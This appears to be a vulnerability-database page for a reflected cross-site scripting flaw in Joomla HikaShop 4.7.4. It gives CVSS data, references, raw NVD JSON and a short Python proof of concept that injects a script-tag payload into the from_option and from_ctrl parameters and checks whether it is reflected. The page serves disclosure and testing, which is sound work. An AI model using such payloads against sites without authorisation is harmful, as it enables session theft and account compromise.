CVE-2023-54364

Description

Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Joomla HikaShop 4.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2023-54364
# Usage: python3 poc.py
import requests

def exploit_xss(target_url):
    # Vulnerable parameters identified in the advisory
    params = {
        "option": "com_hikashop",
        "ctrl": "product",
        "task": "listing",
        # Injecting payload into 'from_option'
        "from_option": '"><script>alert(1)</script>',
        "from_ctrl": '"><script>alert(1)</script>'
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # Check if the payload is reflected unescaped
        if '<script>alert(1)</script>' in response.text:
            print("[+] Vulnerability Confirmed: XSS payload is reflected in the response.")
        else:
            print("[-] Target may not be vulnerable or patched.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://target-site.com/index.php"
    exploit_xss(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54364
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54364
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54364/
[4] VulDB https://vuldb.com/cve/CVE-2023-54364
[5] https://demo.hikashop.com/index.php/en/
[6] https://www.exploit-db.com/exploits/51629
[7] https://www.hikashop.com/
[8] https://www.vulncheck.com/advisories/joomla-hikashop-reflected-xss-via-product-filter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54364", "sourceIdentifier": "[email protected]", "published": "2026-04-09T21:16:06.117", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://demo.hikashop.com/index.php/en/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51629", "source": "[email protected]"}, {"url": "https://www.hikashop.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/joomla-hikashop-reflected-xss-via-product-filter", "source": "[email protected]"}]}}